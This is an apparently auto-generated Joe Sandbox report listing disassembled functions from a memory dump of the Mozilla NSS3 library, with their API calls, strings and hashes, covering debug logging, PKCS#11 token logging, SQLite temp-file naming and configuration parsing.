Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: 02090b4442b2af2a613176eb4d267023ae0962aa59d08cf7f563c6284b2f3874
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: C8E0923A212258A7DF248E09C655AB97359DF81619FB5807DCC5D9FA01E733F80387A1

Function 6C7B09D0 Relevance: 61.5, APIs: 33, Strings: 2, Instructions: 275filetimethreadCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C7B0A22

Part of subcall function 6C769DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C7B0A27), ref: 6C769DC6
Part of subcall function 6C769DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C7B0A27), ref: 6C769DD1
Part of subcall function 6C769DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C769DED

PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C7B0A35

Part of subcall function 6C693810: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C69382A
Part of subcall function 6C693810: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C693879

PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C7B0A66
PR_GetCurrentThread.NSS3 ref: 6C7B0A70
PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C7B0A9D
PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C7B0AC8
PR_vsmprintf.NSS3(?,?), ref: 6C7B0AE8
EnterCriticalSection.KERNEL32(?), ref: 6C7B0B19
OutputDebugStringA.KERNEL32(00000000), ref: 6C7B0B48
OutputDebugStringA.KERNEL32(?), ref: 6C7B0B88
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C7B0C36
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C7B0C45
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C7B0C5D
_PR_MD_UNLOCK.NSS3(?), ref: 6C7B0C76
PR_LogFlush.NSS3 ref: 6C7B0C7E
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C7B0C8D
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C7B0C9C
OutputDebugStringA.KERNEL32(?), ref: 6C7B0CD1
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C7B0CEC
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C7B0CFB
OutputDebugStringA.KERNEL32(00000000), ref: 6C7B0D16
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C7B0D26
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C7B0D35
OutputDebugStringA.KERNEL32(0000000A), ref: 6C7B0D65
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C7B0D70
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C7B0D7E
_PR_MD_UNLOCK.NSS3(?), ref: 6C7B0D90
free.MOZGLUE(00000000), ref: 6C7B0D99

Strings

%ld[%p]: , xrefs: 6C7B0A96
%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - , xrefs: 6C7B0A5B

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: DebugOutputStringfflush$Timefwrite$Unothrow_t@std@@@__ehfuncinfo$??2@$R_snprintfSystem$CriticalCurrentEnterExplodeFileFlushR_vsmprintfR_vsnprintfSectionThreadfputcfreememcpy
String ID: %04d-%02d-%02d %02d:%02d:%02d.%06d UTC - $%ld[%p]:
API String ID: 3820836880-2800039365
Opcode ID: 8c1e8a53dd7505472dcc964b3198e415f8337112c0e8e669be39cdee47e6a6e7
Instruction ID: 95c30e0933a8b389ba8b7a2cc0f46f0ad150763094d695a4e6ae60eb10de2f71
Opcode Fuzzy Hash: 8c1e8a53dd7505472dcc964b3198e415f8337112c0e8e669be39cdee47e6a6e7
Instruction Fuzzy Hash: 23A1C6B1B002549FDB209F28CD8DBDA3B78AF1632CF0805B8F925A3641D775A954CBA1

Function 6C6D28A0 Relevance: 50.9, APIs: 12, Strings: 17, Instructions: 155COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetTokenInfo), ref: 6C6D28BD
PR_LogPrint.NSS3( pInfo = 0x%p,?), ref: 6C6D28EF

Part of subcall function 6C7B09D0: OutputDebugStringA.KERNEL32(?), ref: 6C7B0B88
Part of subcall function 6C7B09D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C7B0C5D
Part of subcall function 6C7B09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C7B0C8D
Part of subcall function 6C7B09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C7B0C9C
Part of subcall function 6C7B09D0: OutputDebugStringA.KERNEL32(?), ref: 6C7B0CD1
Part of subcall function 6C7B09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C7B0CEC
Part of subcall function 6C7B09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C7B0CFB
Part of subcall function 6C7B09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C7B0D16
Part of subcall function 6C7B09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C7B0D26
Part of subcall function 6C7B09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C7B0D35
Part of subcall function 6C7B09D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C7B0D65
Part of subcall function 6C7B09D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C7B0D70
Part of subcall function 6C7B09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C7B0D90
Part of subcall function 6C7B09D0: free.MOZGLUE(00000000), ref: 6C7B0D99

Part of subcall function 6C690F00: PR_GetPageSize.NSS3(6C690936,FFFFE8AE,?,6C6216B7,00000000,?,6C690936,00000000,?,6C62204A), ref: 6C690F1B
Part of subcall function 6C690F00: PR_NewLogModule.NSS3(clock,6C690936,FFFFE8AE,?,6C6216B7,00000000,?,6C690936,00000000,?,6C62204A), ref: 6C690F25

PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C6D28D6

Part of subcall function 6C7B09D0: PR_Now.NSS3 ref: 6C7B0A22
Part of subcall function 6C7B09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C7B0A35
Part of subcall function 6C7B09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C7B0A66
Part of subcall function 6C7B09D0: PR_GetCurrentThread.NSS3 ref: 6C7B0A70
Part of subcall function 6C7B09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C7B0A9D
Part of subcall function 6C7B09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C7B0AC8
Part of subcall function 6C7B09D0: PR_vsmprintf.NSS3(?,?), ref: 6C7B0AE8
Part of subcall function 6C7B09D0: EnterCriticalSection.KERNEL32(?), ref: 6C7B0B19
Part of subcall function 6C7B09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C7B0B48
Part of subcall function 6C7B09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C7B0C76
Part of subcall function 6C7B09D0: PR_LogFlush.NSS3 ref: 6C7B0C7E

PR_LogPrint.NSS3( label = "%.32s",?), ref: 6C6D2963
PR_LogPrint.NSS3( manufacturerID = "%.32s",?), ref: 6C6D2983
PR_LogPrint.NSS3( model = "%.16s",?), ref: 6C6D29A3
PR_LogPrint.NSS3( serial = "%.16s",?), ref: 6C6D29C3
PR_LogPrint.NSS3( flags = %s %s %s %s,CKF_RNG,CKF_WRITE_PROTECTED,CKF_LOGIN_REQUIRED,?), ref: 6C6D2A26
PR_LogPrint.NSS3( maxSessions = %u, Sessions = %u,?,?), ref: 6C6D2A48
PR_LogPrint.NSS3( maxRwSessions = %u, RwSessions = %u,?,?), ref: 6C6D2A66
PR_LogPrint.NSS3( hardware version: %d.%d,?,?), ref: 6C6D2A8E
PR_LogPrint.NSS3( firmware version: %d.%d,?,?), ref: 6C6D2AB6

Strings

n{l, xrefs: 6C6D290B, 6C6D2937
flags = %s %s %s %s, xrefs: 6C6D2A21
CKF_LOGIN_REQUIRED, xrefs: 6C6D29F3, 6C6D2A1E
label = "%.32s", xrefs: 6C6D295E
slotID = 0x%x, xrefs: 6C6D28D1
CKF_USER_PIN_INIT, xrefs: 6C6D29E5
hardware version: %d.%d, xrefs: 6C6D2A89
firmware version: %d.%d, xrefs: 6C6D2AB1
maxSessions = %u, Sessions = %u, xrefs: 6C6D2A43
C_GetTokenInfo, xrefs: 6C6D28B8
pInfo = 0x%p, xrefs: 6C6D28EA
model = "%.16s", xrefs: 6C6D299E
maxRwSessions = %u, RwSessions = %u, xrefs: 6C6D2A61
CKF_WRITE_PROTECTED, xrefs: 6C6D29FE, 6C6D2A1F
serial = "%.16s", xrefs: 6C6D29BE
manufacturerID = "%.32s", xrefs: 6C6D297E
CKF_RNG, xrefs: 6C6D2A13, 6C6D2A20

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Print$DebugOutputString$fflushfwrite$R_snprintf$CriticalCurrentEnterExplodeFlushModulePageR_vsmprintfR_vsnprintfSectionSizeThreadTimefputcfreememcpy
String ID: firmware version: %d.%d$ flags = %s %s %s %s$ hardware version: %d.%d$ label = "%.32s"$ manufacturerID = "%.32s"$ maxRwSessions = %u, RwSessions = %u$ maxSessions = %u, Sessions = %u$ model = "%.16s"$ pInfo = 0x%p$ serial = "%.16s"$ slotID = 0x%x$CKF_LOGIN_REQUIRED$CKF_RNG$CKF_USER_PIN_INIT$CKF_WRITE_PROTECTED$C_GetTokenInfo$n{l
API String ID: 2460313690-747744003
Opcode ID: a54cbdd8e3276171c70187d8d350bc04108efe3240ca6afe98e15754294dd43d
Instruction ID: 5e2cb5d9cd4e3d0d7508eea251deb285c7a755d8d080f5a0b8dc70e20d665032
Opcode Fuzzy Hash: a54cbdd8e3276171c70187d8d350bc04108efe3240ca6afe98e15754294dd43d
Instruction Fuzzy Hash: 9551DAB17011459FEB108F50DF8DA553BA5EB4230DF4A8079E915AB613DB31FD04CB96

Function 6C776E50 Relevance: 44.0, APIs: 19, Strings: 6, Instructions: 213stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C62CA30: EnterCriticalSection.KERNEL32(?,?,?,6C68F9C9,?,6C68F4DA,6C68F9C9,?,?,6C65369A), ref: 6C62CA7A
Part of subcall function 6C62CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C62CB26

memset.VCRUNTIME140(00000000,00000000,?,?,6C63BE66), ref: 6C776E81
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C63BE66), ref: 6C776E98
sqlite3_snprintf.NSS3(?,00000000,6C7DAAF9,?,?,?,?,?,?,6C63BE66), ref: 6C776EC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C63BE66), ref: 6C776ED2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C63BE66), ref: 6C776EF8
sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C63BE66), ref: 6C776F1F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C63BE66), ref: 6C776F28
sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C63BE66), ref: 6C776F3D
memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C63BE66), ref: 6C776FA6
sqlite3_snprintf.NSS3(?,00000000,6C7DAAF9,00000000,?,?,?,?,?,?,?,6C63BE66), ref: 6C776FDB
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C63BE66), ref: 6C776FE4
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C63BE66), ref: 6C776FEF
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C63BE66), ref: 6C777014
sqlite3_free.NSS3(00000000,?,?,?,?,6C63BE66), ref: 6C77701D
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C63BE66), ref: 6C777030
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C63BE66), ref: 6C77705B
sqlite3_free.NSS3(00000000,?,?,?,?,?,6C63BE66), ref: 6C777079
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C63BE66), ref: 6C777097
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C63BE66), ref: 6C7770A0

Strings

winGetTempname2, xrefs: 6C7770C4
winGetTempname4, xrefs: 6C777046
mz_etilqs_, xrefs: 6C776F18
winGetTempname1, xrefs: 6C77708F
P{l, xrefs: 6C7770A8
winGetTempname5, xrefs: 6C777071

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
String ID: P{l$mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 593473924-2118614622
Opcode ID: 5a439eb9148fec9de81fa454e242b009f6b3415eeada5af6e92c08dc5b4f5710
Instruction ID: 1148edad51ebce4abd2b0074f05eef34e0b0b31d623b31a63a0f125f844bcbdd
Opcode Fuzzy Hash: 5a439eb9148fec9de81fa454e242b009f6b3415eeada5af6e92c08dc5b4f5710
Instruction Fuzzy Hash: 18518C71B001196BEB2156309D59FBB361A9FC331CF144538E80597BC5FB25960EC2F6

Function 6C6D8E50 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 169COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_WrapKey), ref: 6C6D8E76
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6D8EA4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6D8EB3

Part of subcall function 6C7BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C7BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C6D8EC9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C6D8EE5
PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6C6D8F17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6D8F29
PR_LogPrint.NSS3(?,00000000), ref: 6C6D8F3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C6D8F71
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6D8F80
PR_LogPrint.NSS3(?,00000000), ref: 6C6D8F96
PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6C6D8FB2
PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6C6D8FCD
PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6C6D9047

Strings

n{l, xrefs: 6C6D8FEC, 6C6D9023
C_WrapKey, xrefs: 6C6D8E71
hKey = 0x%x, xrefs: 6C6D8F5B, 6C6D8F6B
pulWrappedKeyLen = 0x%p, xrefs: 6C6D8FC8
pMechanism = 0x%p, xrefs: 6C6D8EE0
hSession = 0x%x, xrefs: 6C6D8E8E, 6C6D8E9E
*pulWrappedKeyLen = 0x%x, xrefs: 6C6D9042
(CK_INVALID_HANDLE), xrefs: 6C6D8EAC, 6C6D8F1F, 6C6D8F79
pWrappedKey = 0x%p, xrefs: 6C6D8FAD
hWrappingKey = 0x%x, xrefs: 6C6D8F01, 6C6D8F11

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey$n{l
API String ID: 1003633598-516505620
Opcode ID: 8f3b587449d8a5f72888c549389a34f1ee47bf5e8b6f98f8fd8d301a75edb0e5
Instruction ID: d915c7f4167336ddcb5ebd631352c8cd44d571c1819ab5efc02a830a2a3bb363
Opcode Fuzzy Hash: 8f3b587449d8a5f72888c549389a34f1ee47bf5e8b6f98f8fd8d301a75edb0e5
Instruction Fuzzy Hash: CB51A071B01106AFDB109F54DE4CF9A7B76AB4A31DF054029F5087BA22D734B909CBDA

Function 6C704C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C6F4F51,00000000), ref: 6C704C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C6F4F51,00000000), ref: 6C704C5B
PR_smprintf.NSS3(6C7DAAF9,?,0000002F,?,?,?,00000000,00000000,?,6C6F4F51,00000000), ref: 6C704C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C6F4F51,00000000), ref: 6C704CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C704CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C704CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C704D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C6F4F51,00000000), ref: 6C704D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C6F4F51,00000000), ref: 6C704D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C704D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C704DA2
free.MOZGLUE(?), ref: 6C704DB9
free.MOZGLUE(00000000), ref: 6C704DCF

Strings

%s,%s, xrefs: 6C704C4B
any, xrefs: 6C704C96
rust, xrefs: 6C704D22
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6C704D9D
every, xrefs: 6C704CA1
timeout, xrefs: 6C704C91
0x%08lx=[%s %s], xrefs: 6C704D80
ootT, xrefs: 6C704D1A
slotFlags, xrefs: 6C704D34
rootFlags, xrefs: 6C704D47

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: afc05ebe1e7812afd900bcc394ea46065ee71194cfffa76264f269407e0ceb39
Instruction ID: a6dfa76d7c36a223b98afba59083f989036044739c232bc067b6cbdd987c4b6c
Opcode Fuzzy Hash: afc05ebe1e7812afd900bcc394ea46065ee71194cfffa76264f269407e0ceb39
Instruction Fuzzy Hash: A04180F1A0014167DB115F249E896BB3BB5BFA2358F054134EC1A5BB02E731E924D7D7

Function 6C6D4950 Relevance: 38.7, APIs: 13, Strings: 9, Instructions: 170COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_CopyObject), ref: 6C6D4976
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6D49A7
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6D49B6

Part of subcall function 6C7BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C7BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C6D49CC
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C6D49FA
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6D4A09
PR_LogPrint.NSS3(?,00000000), ref: 6C6D4A1F
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C6D4A40
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C6D4A5C
PR_LogPrint.NSS3( phNewObject = 0x%p,?), ref: 6C6D4A7C
PL_strncpyz.NSS3(?, *phNewObject = 0x%x,00000050), ref: 6C6D4B17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6D4B26
PR_LogPrint.NSS3(?,00000000), ref: 6C6D4B3C

Strings

C_CopyObject, xrefs: 6C6D4971
n{l, xrefs: 6C6D4AA6, 6C6D4ADC
*phNewObject = 0x%x, xrefs: 6C6D4B01, 6C6D4B11
pTemplate = 0x%p, xrefs: 6C6D4A39
hObject = 0x%x, xrefs: 6C6D49E4, 6C6D49F4
hSession = 0x%x, xrefs: 6C6D4991, 6C6D49A1
phNewObject = 0x%p, xrefs: 6C6D4A77
(CK_INVALID_HANDLE), xrefs: 6C6D49AF, 6C6D4A02, 6C6D4B1F
ulCount = %d, xrefs: 6C6D4A57

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *phNewObject = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ phNewObject = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_CopyObject$n{l
API String ID: 1003633598-2434402624
Opcode ID: f2a2c23b8c1999ceeea3003ff4930a7d87d32f63ba3cea824e83695d09eccaba
Instruction ID: 7be94584b1b8b055459d3dd57451f138db11f42eb29a95443a0af607bbe323aa
Opcode Fuzzy Hash: f2a2c23b8c1999ceeea3003ff4930a7d87d32f63ba3cea824e83695d09eccaba
Instruction Fuzzy Hash: F8518E71701105ABDB108F54DE8CAAA7B65AB5631DF0A4068F8087BA12D774BD18CBAA

Function 6C6E6910 Relevance: 38.6, APIs: 15, Strings: 7, Instructions: 131COMMON

Download Yara Rule

APIs

NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C6E6943

Part of subcall function 6C704210: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,1BD51D23,flags,?,00000000,?,6C6E5947,flags,printPolicyFeedback,?,?,?,?,?,?,00000000), ref: 6C704220
Part of subcall function 6C704210: NSSUTIL_ArgGetParamValue.NSS3(?,GYnl,?,?,?,?,?,?,00000000,?,00000000,?,6C6E7703,?,00000000,00000000), ref: 6C70422D
Part of subcall function 6C704210: PL_strncasecmp.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C6E7703), ref: 6C70424B
Part of subcall function 6C704210: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C6E7703,?,00000000), ref: 6C704272

NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C6E6957
NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C6E6972
NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C6E6983

Part of subcall function 6C703EA0: isspace.API-MS-WIN-CRT-STRING-L1-1-0(8914C483,70E85609,6C6DC79F,?,6C6E6247,70E85609,?,?,6C6DC79F,6C6E781D,?,6C6DBD52,00000001,70E85609,D85D8B04,?), ref: 6C703EB8

PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C6E69AA
PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C6E69BE
PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C6E69D2
NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C6E69DF

Part of subcall function 6C704020: isspace.API-MS-WIN-CRT-STRING-L1-1-0(FFFFEF69,00000000,?,?,74F84C80,?,6C7050B7,?), ref: 6C704041

free.MOZGLUE(00000000), ref: 6C6E69F6
NSSUTIL_ArgFetchValue.NSS3(-0000000A,?), ref: 6C6E6A04
free.MOZGLUE(00000000), ref: 6C6E6A1B
NSSUTIL_ArgFetchValue.NSS3(-0000000B,?), ref: 6C6E6A29
free.MOZGLUE(00000000), ref: 6C6E6A3F
NSSUTIL_ArgFetchValue.NSS3(-0000000A,?), ref: 6C6E6A4D
NSSUTIL_ArgStrip.NSS3(?), ref: 6C6E6A5B

Strings

keyPrefix=, xrefs: 6C6E69CC
flags, xrefs: 6C6E6937, 6C6E6942, 6C6E6956, 6C6E696D
